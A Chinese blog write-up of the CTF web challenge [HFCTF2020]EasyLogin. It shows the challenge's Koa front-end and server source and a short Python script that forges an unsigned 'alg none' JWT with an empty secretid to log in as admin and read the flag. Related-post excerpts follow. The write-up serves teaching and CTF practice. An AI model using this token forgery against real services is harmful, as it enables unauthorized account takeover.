[HFCTF2020]EasyLogin 1

已于 2024-10-10 11:15:05 修改
阅读量288 收藏 5
点赞数 8
分类专栏: CTF-web-wp 文章标签: java android javascript web安全 ctf
于 2024-10-10 11:04:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ubaichu/article/details/142815965
版权

目录

题目分析

登录界面,有登录和注册功能
在这里插入图片描述
findsomething查看接口
在这里插入图片描述有一个flag接口,拼接上去
在这里插入图片描述
应该是要登录之后才能访问
注册一个账号
在这里插入图片描述
显示用户名错误,猜测应该是获得admin账户的权限后,可以得到flag
在这里插入图片描述
随便注册一个其他的用户名,看看通过什么样的方式认证用户
在这里插入图片描述
通过jwt验证

题目解析

查看jwt的内容
在这里插入图片描述
使用用工具爆破jwt密钥,爆破失败
构造可以绕过检验的jwt

如果将加密方式字段alg修改为none,后端将不执行验证签名
此外对于本题中验证采用的密匙secret值也需要为空或者undefined否则还是会触发验证,所以将JWT中secretid项修改为[]。
iat时间戳字段不变
因为网站加密方式不能为none,需要我们自己写脚本加密

import jwt

token = jwt.encode(
    {
        "secretid": [],
        "username": "admin",
        "password": "123456",
        "iat": 1728527850
    },algorithm="none",key=""
)

print(token)

在这里插入图片描述
在登录的数据包中替换jwt,将用户名、密码也做相应修改
登录成功,再次拼接flag的api
得到flag
在这里插入图片描述

题目中的其他信息

拼接这个api
在这里插入图片描述

/**
 *  或许该用 koa-static 来处理静态文件
 *  路径该怎么配置?不管了先填个根目录XD
 */

function login() {
    const username = $("#username").val();
    const password = $("#password").val();
    const token = sessionStorage.getItem("token");
    $.post("/api/login", {username, password, authorization:token})
        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function register() {
    const username = $("#username").val();
    const password = $("#password").val();
    $.post("/api/register", {username, password})
        .done(function(data) {
            const { token } = data;
            sessionStorage.setItem('token', token);
            document.location = "/login";
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function logout() {
    $.get('/api/logout').done(function(data) {
        const {status} = data;
        if(status) {
            document.location = '/login';
        }
    });
}

function getflag() {
    $.get('/api/flag').done(function(data) {
        const {flag} = data;
        $("#username").val(flag);
    }).fail(function(xhr, textStatus, errorThrown) {
        alert(xhr.responseJSON.message);
    });
}

使用了koa-static框架

/controllers/api.js

获得题目源码

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')
 
const APIError = require('../rest').APIError;
 
module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;
 
        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }
 
        if(global.secrets.length > 100000) {
            global.secrets = [];
        }
 
        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)
 
        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});
 
        ctx.rest({
            token: token
        });
 
        await next();
    },
 
    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;
 
        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }
 
        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;
 
        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
 
        console.log(sid)
 
        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }
 
        const secret = global.secrets[sid];
 
        const user = jwt.verify(token, secret, {algorithm: 'HS256'});
 
        const status = username === user.username && password === user.password;
 
        if(status) {
            ctx.session.username = username;
        }
 
        ctx.rest({
            status
        });
 
        await next();
    },
 
    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }
 
        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });
 
        await next();
    },
 
    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};
白初&
关注
专栏目录
[HFCTF2020]EasyLogin -wp
freerats的博客
07-29 2319
打开网页出现如上登入框,可以发现login和register等并没有php等后缀,初步判断是js框架,f12可以看到app.js 访问一下,提示是基于Node.js的koa框架,但是这个页面的代码并不是逻辑代码,用处不大。 在注释里提示静态文件处理出现问题,那么可能会出现任意文件读取漏洞 这里需要对koa框架的目录有一定的了解 其中controllers目录是项目控制器存放目录:接受请求,处理逻辑 访问controllers/api.js发现处理逻辑 const crypto = require('.
[HFCTF2020]BabyUpload
qq_40327508的博客
08-06 1120
[HFCTF2020]BabyUpload 题目直接给了源代码 <?php error_reporting(0); session_save_path("/var/babyctf/"); session_start(); require_once "/flag"; highlight_file(__FILE__); if($_SESSION['username'] ==='admin') { $filename='/var/babyctf/success.txt'; if(file_e
[HFCTF2020]EasyLogin
Sk1y的博客
09-20 771
知识点:nodejs,jwt 文章目录解题过程参考链接 解题过程 打开题目是个登录窗口,需要注册账号,然后登录,登录之后,有个获取flag的按钮,但是不能够获取flag,因为permission denied。 可以发现提示/static/js/app.js /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val();
[HFCTF2020]EasyLogin JWT认证
qq_54929891的博客
03-31 2765
这里记录一下我写题和学习的过程,具体对JWT还是不太了解的,希望大佬们指点一二 注册账号密码后在登陆的地方抓了个包 发现一个authorization授权,cookie里面有两个参数,感觉这个题应该考的是认证方面的,要用管理员的账户登陆进去才能获得flag,在flag界面只有一个js文件,打开看看 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username =
[HFCTF2020]EasyLogin(nodejs入门)
qq_44657899的博客
10-13 1997
在做这道题之前,完全不会nodejs。于是这道题也看不懂,于是打算学习学习nodejs。 文章目录app.js代码学习第一部分第二部分第三部分第四部分controllers/api.js部分学习 app.js代码学习 首先是/static/js/app.js的代码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val();
BUUCTF---[HFCTF2020]EasyLogin保姆级详解。
m0_62107966的博客
09-11 1450
zhehco--BUUCTF---[HFCTF2020]EasyLogin保姆级详解。按照刚刚要修改的三个值修改,由于要修改alg为none,在网页上无法直接获取新的jwt,所以用python脚本生成,在此之前先用pip安装好生成jwt的库:PyJWT库。值得注意的是这里的iat,是要用你自己在burpsuite里拿到的jwt里的iat值。确定username为admin,且jwt为新生成的jwt后,放包,回到浏览器,访问。重点看看这两个函数,一个是生成jwt的,另一个是返回flag的。
[HFCTF2020]JustEscape
shinygod的博客
04-12 581
知识点:vm2沙盒逃逸 提示了一个run.php文件,没法利用,eval里的就不是一个变量。 <?php if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code); } else { highlight_file(__FILE__); } ?> 凑得处可以计算。 Error().stack测下
[HFCTF2020]EasyLogin --不会编程崽
不会编程的崽的博客
02-22 586
koa&jwt伪造
虎符2020CTF web easylogin.pdf
04-20
从提供的文件内容来看,这篇文档主要讨论了虎符2020CTF (Capture The Flag) 比赛中Web类题目“easylogin”的解题过程。CTF比赛是一种信息安全竞赛,参赛者需要通过解决各种信息安全挑战来获得相应的flag,即密码或...
2022HFCTF-线上赛官方Writeup1
08-04
在HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
---已搬运----BUUCTF:[HFCTF2020]BabyUpload sess_ file_exist()可 检测 目录和文件 。 sha256加密, PHP代码审计
Zero_Adam的博客
04-08 670
目录:一、自己做:1. 本地先试一试1. direction = upload & attr != private2. direction == upload & attr ==private3.direction=download & attr = (private)已经存在的 & filename =必须是完整文件名4.direction=download & attr = (not-private)已经存在的 & filename =必须是完整文件名2.
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 927
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
C语言 | 第十章 | 函数 作用域
ZJC744575的博客
10-05 1216
为完成某一功能的程序指令(语句)的集合,称为函数。在C语言中,函数分为:自定义函数、系统函数(查看C语言函数手册)函数还有其它叫法,比如方法等,在本视频课程中,我们统一称为 函数。返回类型 函数名(形参列表){执行语句...;// 函数体return 返回值;// 可选形参列表:表示函数的输入函数中的语句:表示为了实现某一功能代码块函数可以有返回值,也可以没有, 如果没有返回值,返回类型 声明为 void。
JDK1.0主要特性
最新发布
FoolRabbit的专栏
10-06 359
JDK1.0主要特性。
Spring依赖注入和注解驱动详解和案例示范
J老熊
10-01 1017
在 Spring 框架中,依赖注入(Dependency Injection, DI)和注解驱动(Annotation-Driven)是其核心机制,它们为 Spring 应用提供了灵活性和可扩展性。依赖注入简化了对象间的依赖管理,而注解驱动则通过简洁的注解配置取代了繁琐的 XML 配置。本文将详细分析这两个机制,并通过示例加深理解。
JavaScript ArrayBuffer的读写与类型转换
白瑕 的博客
10-01 522
所有视图的基本单位是ArrayBuffer, ArrayBuffer中只存储二进制格式的数据.ArrayBuffer不可直接读写, 必须通过视图(比如DataView)暴露的API.
字符函数和字符串函数和内存函数
Java_fenxiang的博客
10-05 701
strtok函数原型与功能概述在 C 语言中,strtok函数的原型为char *strtok(char *str, const char *delim)。它的主要功能是将字符串str按照delim中指定的分隔符进行分割,返回被分割出来的子字符串。工作原理首次调用:当第一次调用strtok时,需要将待分割的字符串str作为...
Java中的break、continue和return语句
weixin_73230994的博客
10-05 372
break语句用于终止某个语句块的执行,一般使用在switch或者循环【for, while ,do-while】(提前退出或结束循环不是终止程序)1.continue语句用于结束本次循环,继续执行下一次循环2.continue语句出现在多层嵌套的循环语句体中时,可以通过标签指明要跳过的是哪一层循环,这个和前面的标签的使用规则一样。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值